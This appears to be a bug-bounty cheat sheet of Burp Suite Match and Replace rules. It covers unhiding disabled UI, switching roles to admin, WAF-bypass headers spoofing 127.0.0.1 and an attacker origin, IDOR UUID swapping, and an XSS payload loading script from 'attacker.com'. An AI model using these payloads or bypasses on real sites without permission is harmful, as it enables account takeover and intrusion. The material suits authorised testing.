Match & Replace

Useful Match and Replace BurpSuite Rules

Finding hidden buttons, forms, and other UI elements

Many websites contain hidden buttons, forms, and other UI elements like

<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>

Show Hidden UI (1)

Show Hidden UI (2)

Change disable to enable

Changing `false` to `true`

Sometimes we can get hidden features by changing from false to true. The example:

Changing role from normal user to admin

Make email verified

Bypass WAF

Bypassing WAF by adding some headers

Adding X-Forwarded-Host: 127.0.0.1

Create another rule but change the header to:

X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com

Finding IDOR

By changing original user UUID to another UUID

Create another rule but change the type to "Request First Line"

Finding XSS

By adding some XSS payload into the request

Finding XSS on User-Agent

Finding XSS on Referer

Auto replace user input with XSS payload

So by just inputting the words xss_payload on the website it will be immediately replaced with "><script src=https://attacker.com></script> Change the XSS payload as you want